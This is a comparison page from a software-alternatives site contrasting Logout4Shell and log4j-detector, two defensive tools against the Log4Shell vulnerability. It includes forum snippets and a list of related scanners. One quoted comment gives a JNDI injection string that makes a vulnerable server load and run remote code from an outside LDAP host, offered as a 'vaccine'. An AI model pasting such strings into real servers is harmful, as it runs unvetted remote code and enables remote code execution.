Logout4Shell vs log4j-detector

Logout4Shell

Use Log4Shell vulnerability to vaccinate a victim server against Log4Shell (by Cybereason)

A public open sourced tool. Log4J scanner that detects vulnerable Log4J versions (CVE-2021-44228, CVE-2021-45046, etc) on your file-system within any application. It is able to even find Log4J instances that are hidden several layers deep. Works on Linux, Windows, and Mac, and everywhere else Java runs, too! TAG_OS_TOOL, OWNER_KELLY, DC_PUBLIC (by mergebase)

Log4j cve-2021-44228 cve-2021-45046 Cybersecurity sca Pentest log4shell Scanner Detector cve-2021-45105 vulnerability-scanner

Source Code

Suggest alternative

Edit details

InfluxDB - Power Real-Time Data Analytics at Scale

Get real-time insights from all types of time series data with InfluxDB. Ingest, query, and analyze billions of data points in real-time with unbounded cardinality.

www.influxdata.com

featured

SaaSHub - Software Alternatives and Reviews

SaaSHub helps you find the best software and product alternatives

www.saashub.com

featured

Logout4Shell		log4j-detector
	Project
34	Mentions	8
1,727	Stars	631
-	Growth	0.0%
2.6	Activity	0.0
over 2 years ago	Latest Commit	about 2 years ago
Java	Language	Java
MIT License	License	GNU General Public License v3.0 or later

The number of mentions indicates the total number of mentions that we've tracked plus the number of user suggested alternatives.
Stars - the number of stars that a project has on GitHub. Growth - month over month growth in stars.
Activity is a relative number indicating how actively a project is being developed. Recent commits have higher weight than older ones.
For example, an activity of 9.0 indicates that a project is amongst the top 10% of the most actively developed projects that we are tracking.

Logout4Shell

Posts with mentions or reviews of Logout4Shell. We have used some of these posts to build our list of alternatives and similar projects. The last one was on 2021-12-19.

Am I able to see which Dropbox accounts have viewed my links?
1 project | /r/OSINT | 28 May 2022

#1: RCE 0-day exploit found in log4j, a popular Java logging package | 276 comments #2: Godaddy hacked - including admin passwords for both WordPress sites hosted on the platform, as well as passwords for sFTPs, databases and SSL private keys. | 71 comments #3: Log4shell - using the vulnerability to patch the vulnerability - very clever | 64 comments
Ein etwas anderer Jahresrückblick: 2021 in Google Suchtrends
4 projects | /r/de | 19 Dec 2021

Hier gibt es eine Impfung gegen Log4Shell. Kein Witz: https://github.com/Cybereason/Logout4Shell
Log4j : Logpresso patch issue - remove jndi from jar
1 project | /r/java | 16 Dec 2021

another option : https://github.com/Cybereason/Logout4Shell
I heard you can just inject your server with hydroxychloroquine
2 projects | /r/ProgrammerHumor | 15 Dec 2021

Yup
Patching Log4j
1 project | /r/ProgrammerHumor | 15 Dec 2021

This is actually a thing
Analysis of the 2nd Log4j CVE published earlier (CVE-2021-45046 / Log4Shell2)
11 projects | news.ycombinator.com | 14 Dec 2021

We also wrote a Log4Shell payload that will in-memory "hot patch" your server against Log4Shell.
${jndi:ldap://hotpatch.log4shell.com:1389/a}
If you paste that into a vulnerable server (or even throw it into a log statement in your `main` function), that'll patch you against this until you can manage to update properly.
Source code is on GitHub here[0][1] if you want to host it yourself.
(This work is based on Logout4Shell[2], but we rewrote it to fix the bugs, make it work in more places, and also hosted it so that you don't have to muck with DNS and live server stuff.)
0: https://github.com/lunasec-io/lunasec/releases/
1: (Go source code) https://github.com/lunasec-io/lunasec/tree/master/tools/log4...
2: https://github.com/Cybereason/Logout4Shell
GitHub - Cybereason/Logout4Shell: Use Log4Shell vulnerability to vaccinate a victim server against Log4Shell
1 project | /r/coolgithubprojects | 14 Dec 2021
US warns hundreds of millions of devices at risk from newly revealed software vulnerability
2 projects | /r/iphone | 14 Dec 2021
Log4Shell Log4j vulnerability (CVE-2021-44228) – cheat-sheet reference guide
8 projects | news.ycombinator.com | 13 Dec 2021

The two examples showcase the potential of the RCE. The JNDI endpoint answers with a serialized java class:
a) https://github.com/Cybereason/Logout4Shell where a class is self-healing the log4j vulnerability by reconfiguring it
b) https://twitter.com/marcioalm/status/1470361495405875200 where the payload is opening an application (calculator) on the host system
Log4j 0day being exploited (mega thread/ overview)
3 projects | /r/sysadmin | 12 Dec 2021

For those that are interested!

log4j-detector

Posts with mentions or reviews of log4j-detector. We have used some of these posts to build our list of alternatives and similar projects. The last one was on 2021-12-13.

Continuing log4j detection
1 project | /r/sysadmin | 11 Jan 2022

If you don't have server scanning tools like Nessus or Tenable that are capable of detecting log4j (nested or mitigsted), you could set up ad-hoc scanning with an open source tool like https://github.com/mergebase/log4j-detector
Show HN: Log4j-detector – Finds all Log4j versions on a given file-system
1 project | news.ycombinator.com | 16 Dec 2021
Does Log4J require Java to be installed?
1 project | /r/sysadmin | 14 Dec 2021

No- if you want to determine if a server is vulnerable this is actually the best script which is currently out there: https://github.com/mergebase/log4j-detector
Log4j Windows Scanner
3 projects | /r/sysadmin | 13 Dec 2021

There's also https://github.com/mergebase/log4j-detector, which is from MergeBase (a software composition analysis company).
Welp, how's your LOG4J remediation coming along?
2 projects | /r/sysadmin | 13 Dec 2021
log4j-detector: Detects log4j versions on your file-system, including deeply recursively nested copies (zips inside zips inside zips).
1 project | /r/CKsTechNews | 13 Dec 2021
Detects Log4j versions on your file-system
1 project | news.ycombinator.com | 13 Dec 2021
Log4j 0day being exploited (mega thread/ overview)
3 projects | /r/sysadmin | 12 Dec 2021

What are some alternatives?

When comparing Logout4Shell and log4j-detector you can also consider the following projects:

grype - A vulnerability scanner for container images and filesystems

log4j-scanner - Log4j 2 (CVE-2021-44228) vulnerability scanner for Windows OS

airsonic-advanced

log4jshield - Log4j Shield - fast ⚡, scalable and easy to use Log4j vulnerability CVE-2021-44228 finder and patcher

interactsh - An OOB interaction gathering server and client library

PowerShellSnippets

Apache Log4j 2 - Apache Log4j 2 is a versatile, feature-rich, efficient logging API and backend for Java.

Logout4Shell - Use Log4Shell vulnerability to vaccinate a victim server against Log4Shell

CVE-2021-44228-Log4Shell-Hashes - Hashes for vulnerable LOG4J versions

log4j_CVE-2021-44228_tester - Multithreaded log4j vulnerability scanner using only bash! Tests all JNDI protocols, HTTP GET/POST, and 84 headers. [Moved to: https://github.com/ssstonebraker/log4j-scan-turbo]

apache-log4j-rce-poc

Logout4Shell vs grype log4j-detector vs log4j-scanner Logout4Shell vs airsonic-advanced log4j-detector vs log4jshield Logout4Shell vs interactsh log4j-detector vs PowerShellSnippets Logout4Shell vs Apache Log4j 2 Logout4Shell vs Logout4Shell Logout4Shell vs CVE-2021-44228-Log4Shell-Hashes Logout4Shell vs log4j_CVE-2021-44228_tester Logout4Shell vs PowerShellSnippets Logout4Shell vs apache-log4j-rce-poc

Compare Logout4Shell vs log4j-detector and see what are their differences.

Logout4Shell

log4j-detector

Logout4Shell

log4j-detector

What are some alternatives?